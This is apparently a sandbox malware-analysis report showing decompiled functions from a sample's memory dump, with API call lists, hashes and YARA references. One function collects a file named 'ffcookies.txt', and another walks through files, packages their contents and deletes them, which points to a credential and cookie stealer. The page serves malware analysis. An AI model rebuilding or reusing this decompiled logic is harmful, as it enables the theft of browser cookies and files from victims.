0x0040943b
0x0040943d
0x00409440
0x00409444
0x0040945c
0x00409471
0x00409477
0x00409487
0x00409489
0x00000000
0x00409492
0x00000000

APIs

GlobalMemoryStatusEx.KERNEL32(?,74CB5850,?,?,?,?,?,?,?,?,?,00409A7D,00000000,00000000,00000000,00000000), ref: 00409440
wsprintfW.USER32 ref: 00409471
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A7D,00000000), ref: 00409489

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeGlobalLocalMemoryStatuswsprintf
String ID:
API String ID: 2569036613-0
Opcode ID: 64e85a53e754cb8c1d035c480df7db8858dd6127a9db0cbe0f38b20b7d924fe7
Instruction ID: 691c7a2968302921ddf9a2c3bc51e1d1d0e2bb0df5734c172083d1d357432de7
Opcode Fuzzy Hash: 64e85a53e754cb8c1d035c480df7db8858dd6127a9db0cbe0f38b20b7d924fe7
Instruction Fuzzy Hash: 6501D671A00114ABD700DF6AEC04E6FBBB9EB84324B00453DF616F7291D6749912C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C2 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A4C2(char* __ecx) {
				short* _t7;
				int _t11;
				char* _t14;
				short* _t16;

				_t14 = __ecx;
				_t11 =  *((intOrPtr*)( *0x40e198))(__ecx);
				_t7 = LocalAlloc(0x40, 0x10 + _t11 * 2); // executed
				_t16 = _t7;
				MultiByteToWideChar(0xfde9, 0, _t14, 0xffffffff, _t16, _t11);
				_t16[_t11] = 0;
				return _t16;
			}

0x0040a4ca
0x0040a4d5
0x0040a4e1
0x0040a4e4
0x0040a4f1
0x0040a4f9
0x0040a502

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,76426c3f362f5a47a469f0e9d8bc3eef,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

Strings

76426c3f362f5a47a469f0e9d8bc3eef, xrefs: 0040A4CC, 0040A4E9

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: AllocByteCharLocalMultiWide
String ID: 76426c3f362f5a47a469f0e9d8bc3eef
API String ID: 3282395022-820280900
Opcode ID: 620967e8831f66a80d015b3e32f1d5a571271f4666585bf4ea6a08314ec2853b
Instruction ID: 821f2f2a5b45e58665a0b52f3e5465d9484d76db546a2d81d506fa24111d9f92
Opcode Fuzzy Hash: 620967e8831f66a80d015b3e32f1d5a571271f4666585bf4ea6a08314ec2853b
Instruction Fuzzy Hash: 88E0D8713001207FE21057AA9C84FA76AE8DBC9770F140536F318E72B0D9B01C1083B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041536F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

QQ, xrefs: 00415369

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID:
String ID: QQ
API String ID: 0-3460843698
Opcode ID: f473cefecd5df86fe97d96c8c56a9dbe05cfdfb6797da776bccff34878467c9c
Instruction ID: 35e6eb4f20574c1da3e2a9a82b2d582b64595e55fb0d9e4c6343fd8c0ced53de
Opcode Fuzzy Hash: f473cefecd5df86fe97d96c8c56a9dbe05cfdfb6797da776bccff34878467c9c
Instruction Fuzzy Hash: 880119B5A0150DEBDB04CF54D940BEF73B4AB88384F10855AFC298B340D3B8EA91DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00424366 Relevance: 3.0, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

___crtExitProcess.LIBCMTD ref: 00424375

Part of subcall function 0041D740: ___crtCorExitProcess.LIBCMTD ref: 0041D749

RtlAllocateHeap.NTDLL(0045F044,00000000,00000001), ref: 004243A8

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: ExitProcess___crt$AllocateHeap
String ID:
API String ID: 215841669-0
Opcode ID: fd577c789abfe75a794f6c840ab4e926d32faf681ac1f8a682a6a37b6ce83210
Instruction ID: c68fea34626bc608a6216b9c412624a9537ea85e6661c0bdf65d2760b835db09
Opcode Fuzzy Hash: fd577c789abfe75a794f6c840ab4e926d32faf681ac1f8a682a6a37b6ce83210
Instruction Fuzzy Hash: 7BE09274B00214ABDB14DF90F84A7AE3720EB80309F04413AEE060A292E2799985C78B

Uniqueness

Uniqueness Score: -1.00%

Function 00408619 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408619(void* __ecx) {
				WCHAR* _v8;
				void* __ebx;
				void* __esi;
				void* _t8;
				int _t9;
				void* _t12;
				void* _t23;
				void* _t37;
				void* _t39;
				void* _t41;

				_t8 = LocalAlloc(0x40, 0xff78); // executed
				L1(); // executed
				L1(); // executed
				_t23 = _t8;
				_t39 = _t37;
				_push(_t23);
				_push(_t39);
				_t18 = L"\r\n\r\n";
				_v8 = _t23;
				_t9 = lstrlenW(L"\r\n\r\n");
				_t3 = lstrlenW(_v8) + 0x80; // 0x80
				_t35 = _t3 + _t9;
				_t12 = LocalAlloc(0x40, _t3 + _t9 + _t3 + _t9); // executed
				_t41 = _t12;
				E0040185F(_t41, _t35, _v8);
				E0040188C(L"\r\n\r\n", _t41, _t35, _t41, _t18);
				GlobalFree(_v8); // executed
				return _t41;
			}

0x00408628
0x0040862e
0x0040863a
0x00408644
0x00408646
0x0040a506
0x0040a508
0x0040a510
0x0040a513
0x0040a516
0x0040a525
0x0040a52b
0x0040a533
0x0040a538
0x0040a53e
0x0040a548
0x0040a550
0x0040a55c

APIs

LocalAlloc.KERNEL32(00000040,0000FF78,00000000,00407870), ref: 00408628

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

Strings

, xrefs: 0040863F

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: AllocLocallstrlen$FreeGlobal
String ID:
API String ID: 937752025-2344752452
Opcode ID: bc3759315248a3d9f8ef3571398d1fb34b5d9d99f7b2929ac23ffadec65b976f
Instruction ID: d28f653e51836c90490366c206293b127019c736856f4bca57a512f3e5c56564
Opcode Fuzzy Hash: bc3759315248a3d9f8ef3571398d1fb34b5d9d99f7b2929ac23ffadec65b976f
Instruction Fuzzy Hash: 03D0A720F4831067CF14BAB54C15F2E22929B84320B20883A6205BF3C4CABCDC1183CD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A16F Relevance: 2.6, APIs: 2, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040A16F(void* __ecx, void* __edx, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _t12;
				short _t13;
				void* _t16;
				signed int _t17;
				void* _t18;
				signed int _t24;
				void* _t25;
				void* _t26;
				void* _t29;
				signed int _t34;
				signed int _t36;
				void* _t37;
				void* _t40;
				void* _t41;
				signed short* _t43;
				intOrPtr* _t44;

				_t26 = __edx;
				_t12 =  *((intOrPtr*)( *0x40e18c))(__ecx, __edx, _t37, _t25, __ecx);
				_v8 = _t12;
				if(_t12 == 0) {
					_t13 = 0;
				} else {
					_t16 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(__ecx, _t41) + _t14); // executed
					_t40 = _t16;
					_t17 =  *((intOrPtr*)( *0x40e08c))(_t26);
					_t36 = 0;
					_t43 = _v8 + _t17 * 2;
					_t34 =  *_t43 & 0x0000ffff;
					_t18 = 0x22;
					if(_t34 != _t18) {
						_t24 = 0;
						_t29 = 0x22;
						do {
							_t36 = _t36 + 1;
							 *(_t24 + _t40) = _t34;
							_t24 = _t36 + _t36;
							_t34 =  *(_t24 + _t43) & 0x0000ffff;
						} while (_t34 != _t29);
					}
					_t44 = _a8;
					 *((short*)(_t40 + _t36 * 2)) = 0;
					 *_t44 =  *((intOrPtr*)( *0x40e13c))( *_t44, _t40); // executed
					LocalFree(_t40); // executed
					_t13 = 1;
				}
				return _t13;
			}

0x0040a17a
0x0040a180
0x0040a182
0x0040a187
0x0040a1f8
0x0040a189
0x0040a19e
0x0040a1a6
0x0040a1a9
0x0040a1ae
0x0040a1b2
0x0040a1b5
0x0040a1b8
0x0040a1be
0x0040a1c2
0x0040a1c4
0x0040a1c5
0x0040a1c5
0x0040a1c6
0x0040a1ca
0x0040a1cd
0x0040a1d1
0x0040a1c5
0x0040a1d6
0x0040a1dc
0x0040a1ea
0x0040a1ec
0x0040a1f4
0x0040a1f5
0x0040a1fd

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,00401D77,?,?), ref: 0040A19E
LocalFree.KERNELBASE(00000000,?,00401D77,?,?), ref: 0040A1EC

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: a4121b4af304f9e425f871450021feb797f2bc1189384325bfc8c16f67230c56
Instruction ID: 58c5dcfe122550f1dd4d580a845b1fe98dc3c348f2ec0a40c79b731157ff0f5b
Opcode Fuzzy Hash: a4121b4af304f9e425f871450021feb797f2bc1189384325bfc8c16f67230c56
Instruction Fuzzy Hash: E811E572210111AFE704DFAADD8097AB3FDEF89710B50483AE581EB2A0EAB49C118725

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB24 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__nh_malloc_dbg.LIBCMTD ref: 0041FB3B

Part of subcall function 00415840: __calloc_dbg_impl.LIBCMTD ref: 00415867
Part of subcall function 00415840: __errno.LIBCMTD ref: 0041587E
Part of subcall function 00415840: __errno.LIBCMTD ref: 00415887

__nh_malloc_dbg.LIBCMTD ref: 0041FC67

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __errno__nh_malloc_dbg$__calloc_dbg_impl
String ID:
API String ID: 2503616996-0
Opcode ID: 4038e884bfdae926c20c9a15fb021c6f46d336c8b207d7308693c02cbaf8b1c3
Instruction ID: 85d9ec527e6cbaaf126460574926a2b9f3ef66150f98be4b475bbf6d45bffd36
Opcode Fuzzy Hash: 4038e884bfdae926c20c9a15fb021c6f46d336c8b207d7308693c02cbaf8b1c3
Instruction Fuzzy Hash: 34E0D871E48704DAD7309A559C027987720E740734F60432FE535261C1D67914068E19

Uniqueness

Uniqueness Score: -1.00%

Function 0041B700 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 0041B707

Part of subcall function 0041B630: __crt_wait_module_handle.LIBCMTD ref: 0041B67C
Part of subcall function 0041B630: RtlEncodePointer.NTDLL(?), ref: 0041B6B7

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: EncodePointer__crt_wait_module_handle__encode_pointer
String ID:
API String ID: 2010845264-0
Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction ID: e1cb89af54fb0291e7bf1286e9e6485c2d4d8aea64d1d4d7b257b16ee444ded5
Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction Fuzzy Hash: 69A0127244430C23D00020833807B02350C83D0638F080021F50C051422842A45540D7

Uniqueness

Uniqueness Score: -1.00%

Function 00413410 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMTD ref: 00413415

Part of subcall function 00413430: _check_managed_app.LIBCMTD ref: 004134AC
Part of subcall function 00413430: __heap_init.LIBCMTD ref: 004134B6
Part of subcall function 00413430: _fast_error_exit.LIBCMTD ref: 004134C4
Part of subcall function 00413430: __mtinit.LIBCMTD ref: 004134CC
Part of subcall function 00413430: _fast_error_exit.LIBCMTD ref: 004134D7
Part of subcall function 00413430: __RTC_Initialize.LIBCMTD ref: 004134E9
Part of subcall function 00413430: __amsg_exit.LIBCMTD ref: 00413500
Part of subcall function 00413430: ___crtGetEnvironmentStringsA.LIBCMTD ref: 00413513
Part of subcall function 00413430: ___setargv.LIBCMTD ref: 0041351D
Part of subcall function 00413430: __amsg_exit.LIBCMTD ref: 00413528
Part of subcall function 00413430: __setenvp.LIBCMTD ref: 00413530
Part of subcall function 00413430: __amsg_exit.LIBCMTD ref: 0041353B
Part of subcall function 00413430: __cinit.LIBCMTD ref: 00413545
Part of subcall function 00413430: __amsg_exit.LIBCMTD ref: 0041355A
Part of subcall function 00413430: __wincmdln.LIBCMTD ref: 00413562

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$EnvironmentInitializeStrings___crt___security_init_cookie___setargv__cinit__heap_init__mtinit__setenvp__wincmdln_check_managed_app
String ID:
API String ID: 529411476-0
Opcode ID: 45f551d739f39a4670a7d44ae8a496925fb138a71fc8cac8b44441fd73265ad2
Instruction ID: 23dc5b0091ebacf0523ce2f5ffb20dfc56603b355b79bbbadf5d9a9dcab6b5c7
Opcode Fuzzy Hash: 45f551d739f39a4670a7d44ae8a496925fb138a71fc8cac8b44441fd73265ad2
Instruction Fuzzy Hash: 6EA022320002FC02000233E33003A8A320C08C032C3C8000BB00C030030C0CA8C080BE

Uniqueness

Uniqueness Score: -1.00%

Function 00408FA5 Relevance: 1.3, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00408FA5(void* __ecx) {
				void* _v8;
				void* _v12;
				char _v604;
				intOrPtr* _t19;
				void* _t20;
				intOrPtr* _t34;
				intOrPtr* _t36;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t48;
				void* _t52;
				void* _t53;

				_t19 =  *0x40e190; // 0x7677b690
				_t53 = 0;
				_v8 = 0;
				_t20 =  *_t19(0x40c030, 0, 1, 0x40c010,  &_v8); // executed
				if(_t20 < 0) {
					L3:
					return 0;
				}
				_t40 = _v8;
				_push( &_v12);
				_v12 = 0;
				_push(0x40c020);
				_push(_t40);
				if( *((intOrPtr*)( *_t40))() >= 0) {
					_t41 = _v12;
					_push(0);
					_push(_t41);
					if( *((intOrPtr*)( *_t41 + 0x14))() >= 0) {
						_t52 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						if(_t52 == 0) {
							goto L3;
						}
						_t48 = _v8;
						_push(0);
						_push( &_v604);
						_push(0x104);
						_push(_t52);
						_push(_t48); // executed
						if( *((intOrPtr*)( *_t48 + 0xc))() >= 0) {
							_t53 = _t52;
						} else {
							LocalFree(_t52);
						}
						_t43 = _v12;
						 *((intOrPtr*)( *_t43 + 8))(_t43);
						_t44 = _v8;
						 *((intOrPtr*)( *_t44 + 8))(_t44);
						return _t53;
					}
					_t34 = _v12;
					 *((intOrPtr*)( *_t34 + 8))(_t34);
				}
				_t36 = _v8;
				 *((intOrPtr*)( *_t36 + 8))(_t36);
				goto L3;
			}

0x00408fae
0x00408fb7
0x00408fbc
0x00408fcd
0x00408fd1
0x00408ff4
0x00000000
0x00408ff4
0x00408fd3
0x00408fd9
0x00408fda
0x00408fdd
0x00408fe4
0x00408fe9
0x00408ffa
0x00408ffd
0x00408fff
0x00409007
0x00409022
0x00409026
0x00000000
0x00000000
0x00409028
0x00409031
0x00409032
0x00409033
0x0040903a
0x0040903b
0x00409041
0x0040904c
0x00409043
0x00409044
0x00409044
0x0040904e
0x00409054
0x00409057
0x0040905d
0x00000000
0x00409060
0x00409009
0x0040900f
0x0040900f
0x00408feb
0x00408ff1
0x00000000

APIs

LocalFree.KERNEL32(00000000), ref: 00409044

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: 38dd199c4f0c121f0ad27b3cccfc0052999ba1917e57d09d5119ecbd186de782
Instruction ID: ef33778294753aa54e7f7d2c5df33d66e96767dbe31cdff2da17f2a52da10caf
Opcode Fuzzy Hash: 38dd199c4f0c121f0ad27b3cccfc0052999ba1917e57d09d5119ecbd186de782
Instruction Fuzzy Hash: DD21B071700115EBC714CBA9CD88E9FBBB9EF89704B2001ADF109EB291DA75ED41DB68

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406725 Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 321stringCOMMON

Download Yara Rule

APIs

StrCpyW.SHLWAPI(00000000,00000000), ref: 0040674F

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 004067B9
lstrlenW.KERNEL32 ref: 00406895
lstrlenW.KERNEL32(00000010), ref: 004068A0

Strings

., xrefs: 0040678F
]N, xrefs: 00406751
\ffcookies.txt, xrefs: 004068CE

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocCombineFreeGlobalLocalPath
String ID: .$\ffcookies.txt$]N
API String ID: 3891494632-3491508923
Opcode ID: 879cdd130a76642c1f8c34f2d893b4faa5a20bcdfa89c983fccbb66d58194033
Instruction ID: 20c570a6cb6be533e63ae3ac294d5736f0af275dc5b24bb95add0a5715bb0c19
Opcode Fuzzy Hash: 879cdd130a76642c1f8c34f2d893b4faa5a20bcdfa89c983fccbb66d58194033
Instruction Fuzzy Hash: D9C16FB1E00219AFDB04DFA6DD44AAEBBB5EB88310F104839F915B7391DB745D11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004039D7 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 223
fileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E004039D7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* _v56;
				char _v608;
				signed char _v652;
				void* _t47;
				void* _t50;
				void* _t57;
				void* _t60;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t74;
				void* _t76;
				void* _t78;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t84;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr _t129;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				intOrPtr _t139;
				void* _t143;
				DWORD* _t144;
				void* _t145;
				void* _t149;

				_t101 = __ecx;
				_v24 = __edx;
				_v40 = __ecx;
				_t47 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), __ecx);
				_t129 =  *0x40e1d0; // 0x4e5de0
				_t143 = E0040A503(_t47, _t129);
				_v20 = _t143;
				_t50 =  *((intOrPtr*)( *0x40e018))(_t143,  &_v652);
				_v16 = _t50;
				if(_t50 != 0xffffffff) {
					_t144 = 0;
					do {
						if((_v652 & 0x00000010) != 0) {
							goto L11;
						} else {
							_push(L"..");
							_push( &_v608);
							if( *((intOrPtr*)( *0x40e0a0))() == 0) {
								goto L11;
							} else {
								_t57 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t149 =  *((intOrPtr*)( *0x40e000))(_t57, _t101,  &_v608);
								_v36 = _t149;
								_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t60 = E0040A69E( *0x40e044,  &_v8);
								_t102 = _v8;
								if(_t60 == 0) {
									L16:
									LocalFree(_t102);
									LocalFree(_t149);
									DeleteFileW(_t102);
								} else {
									_push(_t144);
									_push(_t102);
									_push(_t149);
									if( *((intOrPtr*)( *0x40e184))() == 0) {
										goto L16;
									} else {
										_t68 =  *((intOrPtr*)( *0x40e03c))(_t102, 0x80000000, 1, _t144, 4, _t144, _t144);
										_v32 = _t68;
										GetFileSize(_t68, _t144);
										_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t71 =  *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8);
										_t132 =  *0x40e1b4; // 0x4fe610
										_t72 = E0040A503(_t71, _t132);
										_t133 =  *0x40e1b8; // 0x4e5b60
										_t74 = E0040A503(E0040A503(_t72, _t133), _v24);
										_t135 =  *0x40e1ec; // 0x4e5d60
										_t76 = E0040A503(E0040A503(_t74, _t135), _a4);
										_t137 =  *0x40e1ec; // 0x4e5d60
										_t78 = E0040A503(E0040A503(_t76, _t137), _a8);
										_t139 =  *0x40e1b8; // 0x4e5b60
										_t80 = E0040A503(E0040A503(_t78, _t139),  &_v608);
										_v12 = _t80;
										_t81 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, _t144, _t80, 0xffffffff, _t144, _t144, _t144, _t144);
										_v28 = _t81;
										_t22 = _t81 + 0x40; // 0x40
										_t145 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
										_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
										_t84 = _v28;
										if(_t84 == 0) {
											LocalFree(_t145);
											LocalFree(_v8);
											goto L10;
										} else {
											_push(0);
											_push(0);
											_push(_t84);
											_push(_t145);
											_push(0xffffffff);
											_push(_v12);
											_push(0);
											_push(0xfde9);
											if( *((intOrPtr*)( *0x40e0e4))() == 0) {
												LocalFree(_v12);
												LocalFree(_t145);
												LocalFree(_t102);
												LocalFree(_t149);
												LocalFree(_v8);
												break;
											} else {
												_v52 = _v32;
												_v56 = _t145;
												_t98 =  *((intOrPtr*)( *0x40e13c))(_v8, _t102);
												_t126 = _a16;
												_v44 = _v44 & 0x00000000;
												_v48 = _t98;
												 *_t126 =  *_a16 + 1;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t149 = _v36;
												L10:
												LocalFree(_t102);
												LocalFree(_t149);
												_t101 = _v40;
												_t144 = 0;
												goto L11;
											}
										}
									}
								}
							}
						}
						L13:
						LocalFree(_v20);
						goto L14;
						L11:
						_push( &_v652);
						_push(_v16);
					} while ( *((intOrPtr*)( *0x40e148))() != 0);
					FindClose(_v16);
					goto L13;
				}
				L14:
				return 0;
			}

0x004039ed
0x004039ef
0x004039f4
0x004039fd
0x00403a02
0x00403a15
0x00403a1d
0x00403a22
0x00403a24
0x00403a2a
0x00403a30
0x00403a32
0x00403a39
0x00000000
0x00403a3f
0x00403a4a
0x00403a4f
0x00403a54
0x00000000
0x00403a5a
0x00403a66
0x00403a7f
0x00403a88
0x00403a90
0x00403a93
0x00403a98
0x00403a9d
0x00403c78
0x00403c79
0x00403c80
0x00403c87
0x00403aa3
0x00403aa8
0x00403aa9
0x00403aaa
0x00403aaf
0x00000000
0x00403ab5
0x00403ac7
0x00403acb
0x00403ace
0x00403ae1
0x00403af0
0x00403af2
0x00403afa
0x00403aff
0x00403b11
0x00403b16
0x00403b28
0x00403b2d
0x00403b3f
0x00403b44
0x00403b59
0x00403b71
0x00403b74
0x00403b7c
0x00403b7f
0x00403b8d
0x00403b98
0x00403b9b
0x00403ba0
0x00403bfb
0x00403c04
0x00000000
0x00403ba2
0x00403baa
0x00403bab
0x00403bac
0x00403bad
0x00403bae
0x00403bb0
0x00403bb3
0x00403bb4
0x00403bbd
0x00403c52
0x00403c59
0x00403c60
0x00403c67
0x00403c70
0x00000000
0x00403bc3
0x00403bca
0x00403bd2
0x00403bd5
0x00403bd7
0x00403bdd
0x00403be1
0x00403bef
0x00403bf1
0x00403bf2
0x00403bf3
0x00403bf4
0x00403bf5
0x00403c0a
0x00403c0b
0x00403c12
0x00403c18
0x00403c1b
0x00000000
0x00403c1b
0x00403bbd
0x00403ba0
0x00403aaf
0x00403a9d
0x00403a54
0x00403c3f
0x00403c42
0x00000000
0x00403c1d
0x00403c28
0x00403c29
0x00403c2e
0x00403c39
0x00000000
0x00403c39
0x00403c4a
0x00403c4e

APIs

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

GetFileSize.KERNEL32(00000000,00000000), ref: 00403ACE
LocalFree.KERNEL32(00000000), ref: 00403BFB
LocalFree.KERNEL32(?), ref: 00403C04
LocalFree.KERNEL32(?), ref: 00403C0B
LocalFree.KERNEL32(00000000), ref: 00403C12
FindClose.KERNEL32(00000002), ref: 00403C39
LocalFree.KERNEL32(00000002), ref: 00403C42
LocalFree.KERNEL32(?), ref: 00403C52
LocalFree.KERNEL32(00000000), ref: 00403C59
LocalFree.KERNEL32(?), ref: 00403C60
LocalFree.KERNEL32(00000000), ref: 00403C67
LocalFree.KERNEL32(?), ref: 00403C70
LocalFree.KERNEL32(?), ref: 00403C79
LocalFree.KERNEL32(00000000), ref: 00403C80
DeleteFileW.KERNEL32(?), ref: 00403C87

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

Strings

`]N, xrefs: 00403B16, 00403B2D
]N, xrefs: 00403A02
`[N, xrefs: 00403AFF, 00403B44

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$Filelstrlen$AllocCloseDeleteFindGlobalSize
String ID: `[N$`]N$]N
API String ID: 2451396805-684585253
Opcode ID: 9370600c59216989510f23ec487aef7104cddeb0ef86d2a44abe813380e230b8
Instruction ID: a054592f1a26ae81db5b8b4afeeb8fb0c3e9f03fa1f4561a45be05a4ad2e9d15
Opcode Fuzzy Hash: 9370600c59216989510f23ec487aef7104cddeb0ef86d2a44abe813380e230b8
Instruction Fuzzy Hash: 64718571A00214AFDB04DFB2DD49EAE77B9EB84310F104939F515B7290DB749D11CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409064 Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00409064(void* __eflags, intOrPtr* _a4) {
				void* _t13;
